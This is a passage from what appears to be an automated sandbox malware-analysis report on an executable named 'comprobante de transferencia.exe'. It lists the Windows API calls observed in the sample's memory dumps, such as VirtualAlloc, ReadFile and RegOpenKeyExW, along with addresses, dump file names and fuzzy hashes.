                                            • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                            • GetLastError.KERNEL32 ref: 10002A6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: AllocErrorLastVirtual
                                            • String ID:
                                            • API String ID: 497505419-0
                                            • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                            • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                            • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                            • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                            • Instruction ID: 1b5114671cd2f37f61593a5948342403c0197a7a9993dea188d241478f0c7c7c
                                            • Opcode Fuzzy Hash: 2709739294a990dc73731c5d5ee29084b050ed7b5d4126b103810d59a933f9e4
                                            • Instruction Fuzzy Hash: 16F0963160511097CB107B754E0DD5F31659B82328B24467BB911B21E5D9BC8A01956E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                              • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            • Opcode ID: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                            • Instruction ID: 1be42fce3669e14aef02856632b8c3fd6eb27c701acbe6074d6f00ab1ddd0ca8
                                            • Opcode Fuzzy Hash: 390f2af81ab463b3cbd4013dd9a57b5a130c00408a04b447ab1cf3b55cc0eeb8
                                            • Instruction Fuzzy Hash: 30E04F71B05515EBDB11AFA59E4ADAF776AEB40329B14043BF101F00E1C67D8C419A3E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                            • Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
                                            • Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                            • Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: PathSearch
                                            • String ID:
                                            • API String ID: 2203818243-0
                                            • Opcode ID: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                            • Instruction ID: 3ece1a6015159183f920534ecfc8dbbbdcbcaab1af18821eb087b1273417be7a
                                            • Opcode Fuzzy Hash: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                            • Instruction Fuzzy Hash: C1E08672304100EBD750CFA4DE49AAA77ACDF403B8F20457BF615E61D1E6B49A41973D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                            • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                            • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                            • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000690,00000000,00000022,00000000,?,?), ref: 00402CF1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                            • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                            • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                            • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                            • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                            • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                            • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                            • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                            • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                            • Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
                                            • Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                            • Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                            • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                            • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                            • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                            • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                            • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                            • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00403230
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                            • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                            • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                            • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                            • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                            • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                            • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                            • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                            • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                            • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                            • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                            • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                            • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
